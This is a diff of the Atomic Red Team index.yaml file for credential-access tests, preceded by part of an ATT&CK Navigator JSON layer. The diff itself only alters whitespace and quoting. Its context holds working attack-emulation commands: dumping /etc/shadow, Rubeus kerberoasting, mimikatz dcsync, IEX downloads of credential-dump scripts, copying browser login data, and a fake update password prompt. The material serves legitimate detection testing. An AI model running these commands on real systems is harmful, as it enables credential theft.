Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b54288eb..167324d3 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -61,7 +61,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true - name: Access /etc/passwd (Local) @@ -80,13 +80,13 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: Access /etc/{shadow,passwd} with a standard bin that's not cat auto_generated_guid: df1a55ae-019d-4120-bc35-94f4bc5c4b0a description: 'Dump /etc/passwd and /etc/shadow using ed -' + ' supported_platforms: - linux input_arguments: @@ -97,17 +97,17 @@ credential-access: executor: command: 'echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true - name: Access /etc/{shadow,passwd} with shell builtins auto_generated_guid: f5aa6543-6cb2-4fae-b9c2-b96e14721713 description: 'Dump /etc/passwd and /etc/shadow using bash builtins -' + ' supported_platforms: - linux input_arguments: @@ -122,7 +122,7 @@ credential-access: testcat /etc/shadow > #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true T1557.002: 
@@ -313,32 +313,32 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' - description: 'Rubeus must exist -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} -' + ' executor: command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}" -' + ' cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: false T1552.003: @@ -393,7 +393,7 @@ credential-access: description: 'Search through bash history for specifice commands we want to capture -' + ' supported_platforms: - linux - macos @@ -415,7 +415,7 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} -' + ' name: sh T1110: technique: @@ -650,7 +650,7 @@ credential-access: pod service account, for example) can access sensitive information that might include credentials to various services. -' + ' supported_platforms: - containers input_arguments: @@ -661,17 +661,17 @@ credential-access: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get secrets -n #{namespace} -' + ' name: bash elevation_required: false - name: Cat the contents of a Kubernetes service account token file @@ -679,7 +679,7 @@ credential-access: description: 'Access the Kubernetes service account access token stored within a container in a cluster. -' + ' supported_platforms: - linux dependency_executor_name: sh 
@@ -687,24 +687,24 @@ credential-access: - description: Verify docker is installed. prereq_command: 'which docker -' + ' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi -' + ' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker -' + ' get_prereq_command: 'sudo systemctl start docker -' + ' - description: Verify kind is in the path. prereq_command: 'which kind -' + ' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -712,14 +712,14 @@ credential-access: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters -' + ' get_prereq_command: 'sudo kind create cluster --name atomic-cluster -' + ' - description: Verify kubectl is in path prereq_command: 'which kubectl -' + ' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -727,19 +727,19 @@ credential-access: - description: Verify atomic-pod is running. prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod -' + ' get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity -' + ' executor: command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token -' + ' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod -' + ' T1056.004: technique: external_references: @@ -841,7 +841,7 @@ credential-access: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications -' + ' supported_platforms: - windows input_arguments: 
@@ -857,10 +857,10 @@ credential-access: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -946,7 +946,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. -' + ' supported_platforms: - linux input_arguments: @@ -958,16 +958,16 @@ credential-access: dependencies: - description: 'Requires SSHPASS -' + ' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; -' + ' executor: name: bash elevation_required: false @@ -979,7 +979,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. -' + ' supported_platforms: - macos input_arguments: @@ -991,11 +991,11 @@ credential-access: dependencies: - description: 'Requires SSHPASS -' + ' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" brew install hudochenkov/sshpass/sshpass @@ -1091,14 +1091,14 @@ credential-access: executor: command: 'python2 laZagne.py all -' + ' elevation_required: true name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: 'Extracting credentials from files -' + ' supported_platforms: - macos - linux 
@@ -1110,14 +1110,14 @@ credential-access: executor: command: 'grep -ri password #{file_path} -' + ' name: sh - name: Extracting passwords with findstr auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 description: 'Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. -' + ' supported_platforms: - windows executor: @@ -1143,7 +1143,7 @@ credential-access: description: 'This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. -' + ' supported_platforms: - macos - linux @@ -1207,7 +1207,7 @@ credential-access: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "word.Application" | Out-Null @@ -1218,7 +1218,7 @@ credential-access: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -1227,7 +1227,7 @@ credential-access: cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore -' + ' name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] @@ -1254,7 +1254,7 @@ credential-access: command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' -UseBasicParsing); Get-CredManCreds -Force -' + ' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d @@ -1267,7 +1267,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Windows Credentials" /all -' + ' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e 
@@ -1280,7 +1280,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Web Credentials" /all -' + ' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' @@ -1392,11 +1392,11 @@ credential-access: dependencies: - description: 'Modified Sysinternals must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" @@ -1409,7 +1409,7 @@ credential-access: cleanup_command: 'Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Search macOS Safari Cookies auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b @@ -1446,10 +1446,10 @@ credential-access: dependencies: - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path}) -' + ' prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}" @@ -1467,7 +1467,7 @@ credential-access: dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} 
@@ -1495,7 +1495,7 @@ credential-access: dependencies: - description: 'Opera must be installed -' + ' prereq_command: if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1} @@ -1507,23 +1507,23 @@ credential-access: Stop-Process -Name "opera" - description: 'Opera login data file must exist -' + ' prereq_command: if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1} get_prereq_command: 'New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType File -' + ' executor: name: powershell command: 'Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp -' + ' cleanup_command: 'Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore -' + ' - name: Simulating access to Windows Firefox Login Data auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c description: | @@ -1535,7 +1535,7 @@ credential-access: dependencies: - description: 'Firefox must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1} @@ -1546,7 +1546,7 @@ credential-access: Start-Process $installer -ArgumentList '/S' -Wait - description: 'Firefox login data file must exist -' + ' prereq_command: if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1} get_prereq_command: | @@ -1560,7 +1560,7 @@ credential-access: command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force -' + ' cleanup_command: Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig T1552.002: 
@@ -1620,7 +1620,7 @@ credential-access: description: 'Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. -' + ' supported_platforms: - windows executor: @@ -1638,7 +1638,7 @@ credential-access: executor: command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s -' + ' name: command_prompt T1003.006: technique: @@ -1755,7 +1755,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -1772,7 +1772,7 @@ credential-access: command: '#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit" -' + ' T1556.001: technique: external_references: @@ -1979,7 +1979,7 @@ credential-access: description: 'This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system. -' + ' supported_platforms: - windows input_arguments: @@ -2008,11 +2008,11 @@ credential-access: prereq_command: 'if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}" -' + ' executor: name: powershell elevation_required: false @@ -2161,7 +2161,7 @@ credential-access: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' -' + ' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -2292,7 +2292,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
@@ -2370,25 +2370,25 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' - description: 'Rubeus must exist -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} -' + ' executor: name: powershell elevation_required: false @@ -2482,26 +2482,26 @@ credential-access: files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: 'findstr /S cpassword %logonserver%\sysvol\*.xml -' + ' name: command_prompt - name: GPP Passwords (Get-GPPPassword) auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c 
@@ -2526,25 +2526,25 @@ credential-access: dependencies: - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} -' + ' prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } -' + ' get_prereq_command: | New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | . #{gpp_script_path} @@ -2717,15 +2717,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -2760,37 +2760,37 @@ credential-access: description: command flags you would like to run (optional and blank by default) type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' - description: 'Rubeus must exist -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} -' + ' executor: command: | klist purge cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}" cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: false - name: Extract all accounts in use as SPN using setspn @@ -2810,19 +2810,19 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + 